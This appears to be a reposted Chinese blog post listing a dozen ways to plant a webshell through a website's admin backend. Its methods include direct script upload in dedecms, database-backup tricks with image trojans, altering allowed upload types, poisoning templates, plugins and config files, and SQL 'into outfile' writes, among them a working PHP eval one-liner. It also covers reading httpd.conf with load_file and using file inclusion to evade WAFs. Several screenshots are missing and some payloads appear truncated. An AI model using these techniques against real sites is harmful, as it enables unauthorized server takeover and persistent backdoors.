apache的网站配置目录_网站后台getshell的方法总结

news/2024/5/20 23:01:41/文章来源:https://blog.csdn.net/weixin_39977776/article/details/110105614

方法一:直接上传getshell

以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:

7225cd6053e8f830cb1a8e5624bf1d0f.png

即可成功上传大马,并成功执行,从而拿下webshell。

坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名

b478feb90522e60f0aa440b267e682d5.png

753fdf8c0f92ef2ca712cea188e37ab1.png

方法二:数据库备份getshell

以南方数据cms为例:

1,首先上传一张图片马上去,并且获取图片马的路径

2,在系统管理处选择数据库备份,进行数据库备份getshell,具体操作方法如下:

88ff4d9505f3a7662a775b9ec4406ccb.png

6d2447e4c4769abb4bf9cce02405a0ac.png

395ed314b53e1047b87e390706146a90.png

然后使用菜刀连接即可成功getshell。

当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可)

然后再通过备份数据库getshell。

2fb705436b30ebc065aa137df894c7f4.png

方法三:修改网站上传类型配置拿webshell

有的网站在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型,如添加asp|php|jsp|aspx|asa|cer等来拿webshell。

方法四:利用文件解析漏洞来拿webshell

记录在了这篇博客上面:https://www.cnblogs.com/v01cano/p/10326366.html

方法五:网站配置插马拿webshell

注:asp中单引号表示单行注释作用

“%>

一般先试试看该选项是否可以更改,如果可以更改,则插马试试,因为插马可能导致系统崩溃,所以一般需要首先需要本地搭建环境进行测试。

方法六:通过编辑器模板拿webshell

1,通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell。比如ecshop

2,通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿webshell。

26585e39843bb71dc0bcd00991a97fe4.png

方法七:通过添加插件getshell

即利用网站管理员的添加插件功能getshell,将大马添加到插件的压缩包中,然后上传,从而getshell。比如wordpress,dz等等。

方法八:执行sql语句写入webshell

通过sql语句写入shell,首先执行错误的sql语句,使其暴露出网站的根目录:

select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";

关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。

以ecshop为例:

b8ee87a6a7cc180cd01b7c54cb057362.png

也可以先将一句话通过新建管理员写入到user表中,然后通过数据库备份配合解析漏洞拿shell。

55228912ad13c7ccaa1396ba2c7d125f.png

方法九:通过数据库拿webshell

我们可以通过数据库执行命令导出一句话到网站根目录拿shell

access数据库导出一般需要利用解析漏洞xx.asp;.xml

sqlserver导出:

exec sp_makewebtask ‘C:\test1.php‘,‘ select ‘‘‘‘ ‘--

mysql命令导出getshell:

方法1

 Create TABLE xiaoma (xiaoma1 text NOT NULL);

方法2

select "<?php eval($_POST[v01cano]);?>" into outfile ‘D:/phpstudy/www/a.php‘

方法3:方法1和方法2都是在网站根目录路径已知的时候写入shell,当数据库路径未知时,可以通过如下方法读取数据库路径:网站的根目录一般在网站配置文件httpd.conf中,而此目录的路径一般不变,一般在/apache/conf/httpd.conf中,(在phpmyadmin中的时候,我们可以选择变量选项观察其路径,进而推测httpd.conf的路径),在已知该文件路径的条件下,我们可以通过如下方法读取该文件中的内容:

//创建表a,并且将httpd.conf写入到表a中。

然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:

6cc0ba0bc0cc8472ea77dfb7090bf66c.png

httpd.conf文件可能存在的一些路径:

linux中可能存在路径:

方法四:直接通过load_file函数直接加载该文件内容

select load_file(‘C:/phpStudy/Apache/conf/httpd.conf‘);

但是需要在选项中进行如下配置才会显示出来:

10e640a689bf5d4691f7a118ae0cb5a4.png

c481e869da2cd31d4b23855a3730b88d.png

方法n:还有通过日志拿shell的多种方式,已经记录在博客:

https://www.cnblogs.com/v01cano/p/10292670.html

方法十:通过文件包含拿webshell

先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可以绕过waf拿webshell。

常用的文件包含方法如下:

asp包含:

方法十一:命令执行拿webshell

Echo ^^ >c:\1.php

十二:没有进入后台如下拿webshell

  • 0day拿webshell

  • IIS写权限拿webshell(put一个shell进去)

  • 命令执行拿webshell

  • 通过注入漏洞拿webshell

  • 前台图片上传拿webshell

  • Strusts2拿webshell

  • java反序列拿shell

好文推荐

从任意文件读取到GetShell

记一次zabbix安装及漏洞利用getshell全过程

渗透思路整理:当我们拿到网站备份之后的思路

渗透测试某大型互联网公司的思路与收获

有趣的免杀webshell一句话

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_793698.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

百度地图ip地址_柯桥区百度SEO优化是什么,关键词霸屏_万推霸屏

首页 > 新闻中心发布时间&#xff1a;2020-11-12 16:12:09 导读&#xff1a;万推霸屏为您提供柯桥区百度SEO优化是什么,关键词霸屏的相关知识与详情&#xff1a; 无论是企业网站的优化取决于网页或列页面&#xff0c;什么是列页面上的竞争力的关键字这两个词是指竞争力的关键…

Slog27_支配vue框架初阶项目之博客网站-样式居中

ArthurSlogSLog-27Year1GuangzhouChinaJuly 30th 2018GitHub掘金主页简书主页segmentfault没有写够足够的代码量&#xff0c;想成为高手是不可能的&#xff0c;只能纸上谈兵&#xff0c;但写够了代码量&#xff0c;纸上谈兵的也是大有人在 开发环境MacOS(High Sierra 10.13.5) …

刷新你三观!这些堪比软件的神网站你知多少

【PConline 应用】在很多人的固有印象当中&#xff0c;网站的作用无非就是让你看看文字看看图片看看视频&#xff0c;真正要干活&#xff0c;还是得依赖电脑上安装的软件。不过&#xff0c;很多朋友都不知道&#xff0c;实际上很多网站的功能之强大&#xff0c;完全不输本地安装…

seo优化源码_网站关键词SEO优化要点 - 蜘蛛池

最蜘蛛池&#xff0c;快速提高网站收录&#xff0c;百度蜘蛛池、搜狗蜘蛛池、360蜘蛛池、神马蜘蛛池、繁殖池、权重池&#xff0c;欢迎使用。许多企业认为&#xff0c;只要网站建设公司为我们完成网站&#xff0c; 就可以在互联网上建立品牌&#xff0c;最蜘蛛池小编整理发布。…

java 企业 网站源码 模版 屏幕自适应 有前后台 springmvc SSM 生成静态化

博文来源&#xff1a;http://www.fhadmin.org/webnewsdetail3.html前台&#xff1a; 支持五套模版&#xff0c; 可以在后台切换系统介绍&#xff1a;1.网站后台采用主流的 SSM 框架 jsp JSTL&#xff0c;网站后台采用freemaker静态化模版引擎生成html2.因为是生成的html&#x…

google搜索引擎优化指南_什么是SEO?如何优化Google等搜索引擎?

SEO&#xff08;搜索引擎优化&#xff09;是通过搜索引擎的自然搜索结果优化要发现的内容的实践。好处是显而易见的&#xff1a;即网站能获得源源不断的免费自然流量。但是&#xff0c;如何优化SEO的内容&#xff0c;以及“排名因素”实际上重要的是什么&#xff1f;要回答这个…

实时视频网站架构

原文地址&#xff1a;http://www.csdn.net/article/2012-12-10/2812183-JustinTV_real-time_architecture摘要&#xff1a;实时的定义应该是延迟小于250ms&#xff0c;按照这个标准&#xff0c;实时的成功应用立马成了凤毛麟角。本文详细阐述Justin.TV实时系统的技术细节&#…

说说大型高并发高负载网站的系统架构

【IT168 技术文档】 我在CERNET做过拨号接入平台的搭建&#xff0c;而后在Yahoo&3721从事过搜索引擎前端开发&#xff0c;又在MOP处理过大型社区猫扑大杂烩的架构升级等工作&#xff0c;同时自己接触和开发过不少大中型网站的模块&#xff0c;因此在大型网站应对高负载…

已在页面完全加载前强制排版_完全免费、审美过得去、国内访问快的自助建站(个人网站)傻瓜平台推荐...

起因&#xff1a;这周在准备简历的投递&#xff0c;后来觉得没有比有一个网站更容易让别人了解你了&#xff0c;苦于现在在老家&#xff0c;家里电脑较慢且没有一些设计软件&#xff0c;故我的想法就是快速傻瓜的搭建一个网站&#xff0c;且希望能真正完全免费。结果开始在知乎…

奥巴马筹款网站的制作过程

原文地址&#xff1a;http://www.csdn.net/article/2012-12-17/2812909-BarackObama摘要&#xff1a;在美国大选期间&#xff0c;奥巴马网站BarackObama.com创造了2.5亿美元的捐款&#xff0c;对于一个网站来说&#xff0c;它是如何做到的&#xff1f;奥巴马官网 1.Kyle Rush是…

域名解析到域名_网站域名解析图文教程详解

任务&#xff1a;进入域名解析控制面板&#xff0c;对域名进行解析操作域名解析一般在站点(空间)绑定域名之后&#xff0c;进行设置的比如宝塔站点绑定了这2个域名&#xff1a;xxx.com和www.xxx.com所以解析的时候就要解析这2个域名登录官网账号&#xff0c;点击域名管理(第一个…

【198期推荐】医院门户网站服务器选择问题应该三思而后行

本周头条&#xff1a; 请教高手&#xff1a;我院现要建设门户网站&#xff0c;想请教一下&#xff0c;是租用移动公司的服务器好&#xff08;本地移动公司承建网站建设&#xff09;&#xff0c;还是自己建设服务器好。&#xff08;我考虑的是自己建立服务器&#xff0c;为网站预…

大型网站技术架构(一)大型网站架构演化

2019独角兽企业重金招聘Python工程师标准>>> 看完了有一本书&#xff0c;就应该有所收获&#xff0c;有所总结&#xff0c;最近把《大型网站技术架构》一书给看完了&#xff0c;给人的印象实在深刻&#xff0c;再加上之前也搞过书本上讲的反向代理和负载均衡以及ses…

假如我来架构12306网站(一) - 概论

原文地址&#xff1a;http://blog.csdn.net/jackxinxu2100/article/details/8140755序言&#xff1a; 此文的撰写始于国庆期间&#xff0c;当中由于工作过于繁忙而不断终止撰写&#xff0c;最近在设计另一个电商平台时再次萌发了完善此文并且发布此文的想法&#xff0c;期望自…

phpchina网站首页改版了,貌似也不再属于康盛旗下啦

2019独角兽企业重金招聘Python工程师标准>>> phpchina网站首页改版了&#xff0c;貌似也不再属于康盛旗下啦 具体的情况不清楚&#xff0c;貌似变成了一家做站和PHP培训公司啦 杯具 转载于:https://my.oschina.net/tenking/blog/41993

图片瀑布流的威力?最新数据显示Pinterest有望成为第二大社交网站,仅次于Facebook

原文地址&#xff1a;http://www.36kr.com/p/201371.html从用户量来看&#xff0c;Facebook 毫无疑问是目前最大的社交网站&#xff0c;且居于主导地位。但对于第二名的争夺&#xff0c;最新的数据显示&#xff0c;Pinterest 有望超过 Twitter&#xff0c;问鼎第二名。 据皮尤研…

大型网站系统架构分析

千万级的注册用户&#xff0c;千万级的帖子&#xff0c;nTB级的附件&#xff0c;还有巨大的日访问量&#xff0c;大型网站采用什么系统架构保证性能和稳定性&#xff1f; 首先讨论一下大型网站需要注意和考虑的问题。 数据库海量数据处理&#xff1a;负载量不大的情况下select、…

php新手学习php的好网站(推荐!!)

为什么80%的码农都做不了架构师&#xff1f;>>> 在论坛中看到很多php新手朋友&#xff0c;苦于找不到好的文章或资料&#xff0c;对php无从下手。 为大家推荐几个不错的学习php的网站&#xff0c;有需要的朋友&#xff0c;可以参考下。 1、php100.com 这个搞php的朋…

大型网站技术架构(四)网站的高性能架构

2019独角兽企业重金招聘Python工程师标准>>> 网站性能是客观的指标&#xff0c;可以具体体现到响应时间、吞吐量、并发数、性能计数器等技术指标。 1、性能测试指标 1.1 响应时间 指应用执行一个操作需要的时间&#xff0c;指从发出请求到最后收到响应数据所需要的时…

MVC4做网站后台:用户管理 —用户

这块进行用户管理&#xff0c;可以浏览、查询已注册的用户&#xff0c;修改用户资料&#xff0c;删除用户等。没有做添加用户&#xff0c;不知是否必要。列表页还是使用easyui的datagrid。这个思路跟用户组的方式差不多。 1、接口InterfaceUser 命名空间Ninesky.Repository 功能…